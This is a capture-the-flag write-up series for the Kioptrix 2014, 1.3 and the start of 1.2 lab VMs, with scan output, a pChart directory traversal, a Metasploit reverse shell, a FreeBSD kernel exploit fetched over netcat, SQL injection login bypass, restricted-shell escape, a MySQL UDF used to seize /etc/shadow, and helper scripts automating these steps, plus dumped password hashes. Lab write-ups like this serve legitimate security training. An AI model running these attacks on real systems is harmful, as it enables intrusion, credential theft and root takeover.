Write-up for Kioptrix Virtual Machines from Vulnhub

lvl01_kioptrix_01

I have finally completed the writeup of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com, I hope they are helpful to you.

While they are categorised as “beginner” level challenges, I found them quite challenging and an effective training exercise. I learnt many things working through these VMs.

For your convenience, the following are the 5 write-ups on Kioptrix machines,

Cheerios!

Write-up for Kioptrix: 2014 (#5)

This is the final post of the Kioptrix series write-up.

lvl-5-000

Perform hosts discovery using nmap
> nmap -Pn 192.168.117.0/24 -T5 --version-light

Nmap scan report for 192.168.117.133
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 00:0C:29:BD:C5:DD (VMware)

Only two open ports, both HTTP.

Let’s run a directory brute-forcer to check for interesting pages or a login form,
> dirb http://192.168.117.133

+ http://192.168.117.133/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.117.133/index.html (CODE:200|SIZE:152)
> dirb http://192.168.117.133:8080
+ http://192.168.117.133:8080/cgi-bin/ (CODE:403|SIZE:210)

No luck!

Perform Nikto vulnerability scan on the servers
> nikto -h http://192.168.117.133

– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.117.133
+ Target Hostname: 192.168.117.133
+ Target Port: 80
+ Start Time: 2016-10-27 13:52:44 (GMT8)
—————————————————————————
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sun Mar 30 01:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

Most of these are banner-based version findings. One of them is a false positive: the OSVDB-756 / CVE-2002-0082 line fires because nikto compares “mod_ssl/2.2.21” against the 2.8.x numbering of the old Apache 1.3 add-on, whereas the mod_ssl bundled with Apache 2.x simply carries Apache’s own version number. We will come back to the rest if required. Let’s try to navigate to the web pages first.

Navigating to the website hosted on HTTP server port 8080 – it says that I don’t have the permission to access the page.

lvl-5-001

Moving on to the HTTP server port 80, it gives me the default page saying “It Works”.

lvl-5-002

However, the good news is that its source contains something that is not included in the default page.

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

Let’s try to navigate to the mentioned URL:
> 192.168.117.133/pChart2.1.3/index.php

lvl-5-003

Google for known vulnerabilities

Indeed: the advisory linked here documents multiple vulnerabilities in pChart 2.1.3, namely directory traversal and cross-site scripting.

Perform directory traversal

Following the advisory’s instructions, we can perform the directory traversal using its sample request as a reference,

“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd”

In our case, run the exact following line (replace to your target’s IP address, of course)
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
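The traversal request above, scripted, as an added example that is not part of the original write-up: it builds the same URL for any absolute path, fetches it with curl, and filters a passwd dump down to the accounts that can actually log in, which is what you want to know before trying SSH or su. The target address and the pChart path are the write-up’s; the curl fetch and the awk triage are my additions.

```shell
#!/bin/sh
# Added example, not from the original write-up: script the pChart 2.1.3
# traversal and triage the passwd dump it returns.

# traversal_url TARGET ABSOLUTE_PATH
# pChart's examples/index.php opens the file named by the Script parameter
# relative to its own directory, so two URL-encoded "/.." hops (%2f..) climb
# out to the filesystem root before the requested path is appended.
traversal_url() {
    printf 'http://%s/pChart2.1.3/examples/index.php?Action=View&Script=%%2f..%%2f..%%2f%s\n' \
        "$1" "${2#/}"
}

# read_remote TARGET ABSOLUTE_PATH  (needs the target; not run by the test)
# e.g. read_remote 192.168.117.133 /usr/local/etc/apache22/httpd.conf
read_remote() {
    curl -s "$(traversal_url "$1" "$2")"
}

# interactive_accounts: passwd lines on stdin -> "user:shell" for every account
# whose shell is not a nologin/false stub. An empty shell field is not a stub:
# FreeBSD treats it as /bin/sh, which is why toor shows up in the demo below.
interactive_accounts() {
    awk -F: '$1 !~ /^#/ && NF >= 7 && $7 !~ /(nologin|false)$/ { print $1 ":" $7 }'
}

# Stand-alone demo on lines excerpted from the dump above (no network needed):
printf '%s\n' \
    'root:*:0:0:Charlie &:/root:/bin/csh' \
    'toor:*:0:0:Bourne-again Superuser:/root:' \
    'www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin' \
    'ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin' \
    | interactive_accounts
```

The demo prints root and toor only; every other account in the dump is a daemon with a nologin shell, so the credential hunt that follows is really a hunt for root’s password or for a way to run code as the web user.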

Directory traversal works. Remember the site on port 8080, the one that refused to show us anything?

Let’s read the Apache configuration to see how that site is set up.

This is a FreeBSD host, and Apache 2.2 installed from ports keeps its configuration at /usr/local/etc/apache22/httpd.conf (the directory name follows the Apache minor version).
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

Bingo, it works.

lvl-5-004

The following is suspiciously interesting,

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

SetEnvIf sets the environment variable Mozilla4_browser whenever the User-Agent header matches the regular expression ^Mozilla/4.0, and the “Allow from env=” line grants access to the data2 document root only when that variable is set. This is not a “Firefox 4” check: the pattern is an anchored prefix match on a header the client controls, so any User-Agent string that starts with Mozilla/4.0 passes (Firefox 4 actually identifies itself as Mozilla/5.0 and would be refused), and anything else gets the 403 we saw earlier.

The classic string that satisfies it is the Internet Explorer 4 User-Agent:

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)

There are many ways to send it (curl -A, an intercepting proxy, a browser extension). I use a Firefox plugin called Quick Preference Button: it has many components, but you only need to set the item under Prefs > Spoof > Custom to the string above.
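The check Apache is applying, reproduced locally, as an added example that is not part of the original write-up: it runs the same regex over a few candidate User-Agent strings and shows which ones the SetEnvIf line would accept, then wraps the curl request that sends the accepted string to the gated site. The regex and the MSIE 4.01 string are from the write-up; the other sample User-Agent strings are constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up: reproduce the Apache
# `SetEnvIf User-Agent ^Mozilla/4.0` test locally and fetch the gated site.

# Same regex as the httpd.conf line. SetEnvIf anchors only where the pattern
# does, so this is a prefix match on a header the client chooses.
MOZILLA4_RE='^Mozilla/4.0'

# ua_allowed STRING: exit 0 when Apache would set Mozilla4_browser for it.
ua_allowed() {
    printf '%s\n' "$1" | grep -Eq "$MOZILLA4_RE"
}

# classify_ua STRING: print allow/deny (handy for a quick table).
classify_ua() {
    if ua_allowed "$1"; then echo allow; else echo deny; fi
}

# fetch_gated TARGET: the request the browser plugin makes for you
# (needs the target; not run by the test).
fetch_gated() {
    curl -s -A 'Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)' "http://$1:8080/"
}

# Stand-alone demo. Note that Firefox 4 itself is refused: its User-Agent
# starts with Mozilla/5.0, so the config was never about that browser, while
# any old Internet Explorer (IE4 through IE8 all begin with Mozilla/4.0) passes.
for ua in \
    'Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)' \
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)' \
    'Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0' \
    'curl/7.74.0'
do
    printf '%-5s %s\n' "$(classify_ua "$ua")" "$ua"
done
```

The lesson for the defending side is the same as for the attacking side: a header-based Allow is an obscurity measure, not access control, because the header is whatever the client says it is.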

lvl-5-005

Now that you are sending the Mozilla/4.0 user agent, the page finally loads,

lvl-5-006

The phptax web page information looks pretty old school.

lvl-5-007

A quick search shows that Metasploit has a ready-made module for PhpTax.
> msfconsole
> search phptax

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/http/phptax_exec 2012-10-08 excellent PhpTax pfilez Parameter Exec Remote Code Injection

> use exploit/multi/http/phptax_exec
> set rhost 192.168.117.133
> set rport 8080
> exploit

[*] Started reverse TCP double handler on 192.168.117.128:4444
[*] 192.168.117.133:8080 - Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo UPBXBAbsRsBHMrXp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo PLFkF52o2dwDMsR3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “UPBXBAbsRsBHMrXp\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “PLFkF52o2dwDMsR3\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.117.128:4444 -> 192.168.117.133:48546) at 2016-10-27 14:51:35 +0800
[*] Command shell session 2 opened (192.168.117.128:4444 -> 192.168.117.133:63426) at 2016-10-27 14:51:35 +0800

> id

uid=80(www) gid=80(www) groups=80(www)

Now we have a limited shell as user www.

Check the kernel version
> uname -a

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

Search for vulnerabilities in FreeBSD 9.0
> Check out FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation (CVE-2012-0217, fixed by FreeBSD-SA-12:04). Two things to confirm before relying on it: the bug only affects Intel CPUs, and a kernel reporting plain 9.0-RELEASE with no -pN suffix has had no security patches applied, so the June 2012 fix is certainly absent.

Serve the exploit source from your attacker machine with netcat
> nc -lvp 6666 < getr00t.c

From the limited shell on the target, pull it down (192.168.117.128 is the attacker machine)
> nc -nv 192.168.117.128 6666 > r00t.c

Finally, compile and run it
> gcc r00t.c
> ./a.out
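Before throwing the exploit, two checks are worth scripting. The following is an added example, not part of the original write-up or of the exploit: it takes the CPU model string (sysctl -n hw.model on FreeBSD) and the uname -r release string and says whether the SYSRET bug can plausibly be present, and it sketches the netcat transfer with an md5 comparison so a truncated copy does not waste a compile. The attacker address is the write-up’s; the CPU strings in the demo are constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up: go/no-go checks for the
# FreeBSD SYSRET bug (CVE-2012-0217, FreeBSD-SA-12:04) plus a checksummed copy
# of the exploit source. Inputs are `sysctl -n hw.model` and `uname -r`
# taken from the target.

# cpu_is_intel MODEL: the bug is in Intel's SYSRET handling of non-canonical
# return addresses; AMD CPUs are not affected.
cpu_is_intel() {
    case "$1" in
        *Intel*) return 0 ;;
        *) return 1 ;;
    esac
}

# kernel_unpatched RELEASE: freebsd-update stamps security patches as -pN, so
# a bare X.Y-RELEASE string has had none applied and cannot carry the
# June 2012 fix. Anything else needs a look at the advisory's patch levels.
kernel_unpatched() {
    case "$1" in
        *-RELEASE) return 0 ;;
        *) return 1 ;;
    esac
}

# sysret_precheck MODEL RELEASE: prints a verdict; exit status 0 only for "go".
sysret_precheck() {
    if ! cpu_is_intel "$1"; then
        echo "no-go: $1 is not an Intel CPU"; return 1
    fi
    if ! kernel_unpatched "$2"; then
        echo "unsure: $2 carries patches, compare with FreeBSD-SA-12:04"; return 2
    fi
    echo "go: $2 on an Intel CPU"
}

# Transfer with an integrity check (network; not run by the test):
#   attacker: md5sum getr00t.c; nc -lvp 6666 < getr00t.c
#   target:   nc -nv 192.168.117.128 6666 > r00t.c; md5 r00t.c
#   target:   gcc r00t.c -o r00t && ./r00t      # only once the md5s match

# Stand-alone demo with constructed model strings:
sysret_precheck 'Intel(R) Core(TM) i7 CPU' '9.0-RELEASE' || true
sysret_precheck 'AMD Opteron(tm) Processor 6172' '9.0-RELEASE' || true
```

On this VM uname reports 9.0-RELEASE with no patch suffix, which is the “go” case as long as the hypervisor exposes an Intel CPU; on an AMD host the exploit will not work however unpatched the kernel is.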

[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!

> id

uid=0(root) gid=0(wheel) groups=0(wheel)

Congrats, you are now root!

> cd /root
> cat congrats.txt

If you are reading this, it means you got root (or cheated).
Congratulations either way…

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can’t enjoy them.

As with all my VMs, besides getting “root” on the system, the goal is to also
learn the basic skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and “hope” it works, but think about the traffic.. the logs… Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targeted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you an idea of what will work and what won’t from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren’t in “/var/log/apache/access.log”, but in “/var/log/httpd-access.log”.
It’s default document root is not “/var/www/” but in “/usr/local/www/apache22/data”.
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed “OSSEC-HIDS” and monitored a few things.
Default settings, nothing fancy but it should’ve logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn’t support “iNotify”, I couldn’t use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory.
Lastly, the ossec-alerts.log file is where OSSEC-HIDS puts alerts when monitoring certain
files. This one should’ve detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good…

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each “web attack” detected by OSSEC-HIDS, by
default it would’ve blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)
Here we conclude the Kioptrix CTF series.
Cheers.

And yes, this concludes my Kioptrix series write-up! Cheers.

Write-up for Kioptrix: Level 1.3 (#4)

Once again, a continuation of the Kioptrix series writeup!

First of all, something different about Kioptrix level 1.3 (#4): unlike the previous VMs, it comes only as a Virtual Machine Disk (VMDK) file, so you cannot simply open it the way you did the earlier ones.

Click here to view my step-by-step guide to create a VM using existing VMDK file, which is ideal in this case. 

lvl-4-000

Scan for the VM using nmap
> nmap 192.168.117.100-200 -Pn -T5

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-26 21:29 SGT
Nmap scan report for 192.168.117.132
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:7C:1F:EC (VMware)

Scan the web server for possible web pages

Run Directory Buster
> dirb http://192.168.117.132

—- Scanning URL: http://192.168.117.132/ —-
+ http://192.168.117.132/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.117.132/images/
+ http://192.168.117.132/index (CODE:200|SIZE:1255)
+ http://192.168.117.132/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.117.132/john/
+ http://192.168.117.132/logout (CODE:302|SIZE:0)
+ http://192.168.117.132/member (CODE:302|SIZE:220)
+ http://192.168.117.132/server-status (CODE:403|SIZE:335)

—- Entering directory: http://192.168.117.132/images/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

—- Entering directory: http://192.168.117.132/john/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

Run GoBuster
> gobuster -u 'http://192.168.117.132' -w /usr/share/wordlists/dirb/big.txt

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.117.132/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/images (Status: 301)
/index (Status: 200)
/john (Status: 301)
/logout (Status: 302)
/member (Status: 302)
/robert (Status: 301)

Visit the webpage hosted on target machine

lvl-4-001

lvl-4-002

lvl-4-003

lvl-4-004

lvl-4-005

lvl-4-006

Perform SQL Injection

Back to the login page, let’s try logging in as john or robert

lvl-4-007

Enter the following in the login form (the trailing space after the two dashes matters: MySQL only treats -- as a comment when whitespace follows it)
> username: john
> password: ' or 1=1 -- 

lvl-4-008

Do the same using username “robert” and you will have the following 2 credentials for login,

  • john / MyNameIsJohn
  • robert / ADGAdsafdfwt4gadfga==

Login via SSH
> ssh john@192.168.117.132

lvl-4-009

> ssh robert@192.168.117.132

lvl-4-010

Both users are dropped into lshell, a restricted shell written in Python.

After some research, it turns out this shell can be escaped by using the echo command to call os.system:

> echo os.system('/bin/bash')
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> ls -la /home/loneferret

total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory
-rw------- 1 root root 68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root root 1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful

Check which user MySQL runs as
> ps -ef | grep mysql

root 4892 1 0 Oct29 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
root 4934 4892 0 Oct29 ? 00:00:04 /usr/sbin/mysqld --basedir=/usr
root 4935 4892 0 Oct29 ? 00:00:00 logger -p daemon.err -t mysqld_s
john 6119 6071 0 00:57 pts/0 00:00:00 grep mysql

Good news: mysqld is running as root. Let’s see whether its credentials are hard-coded in the web application’s source
> ls /var/www

checklogin.php images john logout.php robert
database.sql index.php login_success.php member.php

> cat /var/www/checklogin.php

[ … omitted … ]
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
[ … omitted … ]

Login to MySQL as user root
> mysql -u root -h localhost

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 854
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

Some research shows that a MySQL server running as root can be turned into a privilege escalation.

Since we can log in to MySQL as its root user, we can load a User Defined Function (UDF) that runs operating system commands, and those commands execute with the privileges of the mysqld process, which here is root.

The usual library is lib_mysqludf_sys.so. Its two most commonly used functions are

  • sys_eval (executes an arbitrary command and returns its output)
  • sys_exec (executes an arbitrary command and returns its exit code)

A UDF has to be registered with CREATE FUNCTION … SONAME before MySQL will call it, and the library has to be somewhere mysqld can load it from. The good news is that there is no need to download anything here: the library is already on the VM and, as the SELECT further down shows, sys_exec is evidently already registered. Thanks to the creator!
> whereis lib_mysqludf_sys.so

/usr/lib/lib_mysqludf_sys.so
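Scripting the UDF path, as an added example that is not part of the original write-up: it generates the SQL with the command safely quoted, registers sys_exec when mysql.func does not already list it, and runs the command. The root / empty-password login comes from checklogin.php above; the assumption that mysqld’s dynamic linker can load the library from /usr/lib is mine.

```shell
#!/bin/sh
# Added example, not from the original write-up: drive lib_mysqludf_sys from a
# script. Assumes the root / empty-password login from checklogin.php and that
# the .so is somewhere mysqld's dynamic linker will find it (/usr/lib here).
# On this VM the creator has already registered sys_exec; elsewhere the
# register step below is needed first.

MYSQL='mysql -u root -h localhost'

# sql_quote STRING: double single quotes so STRING can sit inside '...'.
sql_quote() {
    printf '%s\n' "$1" | sed "s/'/''/g"
}

# sys_exec_sql COMMAND: the statement that runs COMMAND as the mysqld user.
sys_exec_sql() {
    printf "SELECT sys_exec('%s');\n" "$(sql_quote "$1")"
}

# register_udf_sql: UDFs must be declared once; mysql.func records them.
register_udf_sql() {
    printf "CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';\n"
}

# --- live helpers, need the target's MySQL (not run by the test) ---
udf_registered() {
    [ "$($MYSQL -N -e "SELECT COUNT(*) FROM mysql.func WHERE name='sys_exec'")" = 1 ]
}

# run_as_mysqld COMMAND: register if needed, then execute. Only useful when
# mysqld itself runs as root, which ps confirmed above.
run_as_mysqld() {
    udf_registered || $MYSQL -e "$(register_udf_sql)"
    $MYSQL -e "$(sys_exec_sql "$1")"
}

# e.g.  run_as_mysqld 'chown john.john /etc/shadow'
```

The quoting helper is the part people skip: a command containing a single quote, such as a redirect wrapped in echo '…', would otherwise break out of the SQL string and fail, or worse, run something other than what you intended.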

mysql> SELECT sys_exec('chown john.john /etc/shadow');

+-----------------------------------------+
| sys_exec('chown john.john /etc/shadow') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT sys_exec('chown john.john /etc/passwd');

+-----------------------------------------+
| sys_exec('chown john.john /etc/passwd') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT sys_exec('chown -R john.john /root');

+--------------------------------------+
| sys_exec('chown -R john.john /root') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.01 sec)

> cat /root/congrats.txt

Congratulations!

You’ve got root.

There is more than one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
Loneferret

Not quite. We are still john; we have only gained read access to root’s files.
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> cat /etc/shadow

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::

Now edit /etc/passwd (john owns it now) and remove the ‘x’ from root’s line so that the password field is empty. The line

root:x:0:0:root:/root:/bin/bash

becomes

root::0:0:root:/root:/bin/bash

Then edit /etc/shadow and strip root’s hash so that its password field is empty as well. The line

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::

becomes

root::15375:0:99999:7:::

Back to MySQL again, we will change the owner of the ssh config files to john

mysql> SELECT sys_exec('chown -R john.john /etc/ssh');

+-----------------------------------------+
| sys_exec('chown -R john.john /etc/ssh') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.00 sec)

Edit /etc/ssh/sshd_config and find the following line; change it to yes.

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

Then find this line (it should be the very last one) and change it to no, so that sshd checks the now-empty password itself rather than handing it to PAM.

UsePAM yes

Save the file. sshd reads its configuration only at start-up, so it has to be restarted for the change to take effect; the blunt way used here is to reboot the box through the UDF.

mysql> SELECT sys_exec('reboot');

> ssh root@192.168.117.132
> id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now logged in as root!

I came across an even faster way to get root.

Log in to MySQL and run the following to add robert to the admin group, which on this Ubuntu release is allowed to use sudo.
> select sys_exec('usermod -a -G admin robert');

+----------------------------------------+
| sys_exec('usermod -a -G admin robert') |
+----------------------------------------+
| NULL                                   |
+----------------------------------------+
1 row in set (0.03 sec)

Now log in as robert (group membership is read at login, so start a fresh session) and run sudo su with robert’s own password.

robert@Kioptrix4:~$ sudo su
[sudo] password for robert:
root@Kioptrix4:/home/robert# whoami
root

There you go, root!

Write-up for Kioptrix: Level 1.2 (#3)

This is a continuation of the Kioptrix series writeup, level 1.2, Virtual Machine (VM) number 3.

Add target server to list of hosts

lvl-3-000

First of all, modify your hosts file as instructed by the creator on the Vulnhub page for Kioptrix level 1.2 (#3), or simply refer to the screenshot above.

We should edit the host file to point the target server to kioptrix3.com. Below is the snippet, I modified it slightly,

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

  • Under Windows, edit C:\Windows\System32\drivers\etc\hosts
  • Under Linux, edit /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to do this

Perform network discovery on your network to find the host
> nmap -Pn 192.168.117.0/24

Nmap scan report for kioptrix3.com (192.168.117.131)
Host is up (0.00040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:D1:8E:A1 (VMware)

Run Directory Buster
> dirb http://192.168.117.131

—- Scanning URL: http://192.168.117.131/ —-
==> DIRECTORY: http://192.168.117.131/cache/
==> DIRECTORY: http://192.168.117.131/core/
+ http://192.168.117.131/data (CODE:403|SIZE:326)
+ http://192.168.117.131/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.117.131/gallery/
+ http://192.168.117.131/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.117.131/modules/
==> DIRECTORY: http://192.168.117.131/phpmyadmin/

We have found some interesting paths. Both the modules and phpmyadmin pages give away version information.

lvl-3-001

lvl-3-002

Back to normal browsing: the site has a regular index page, shown below, with links to an admin login page.

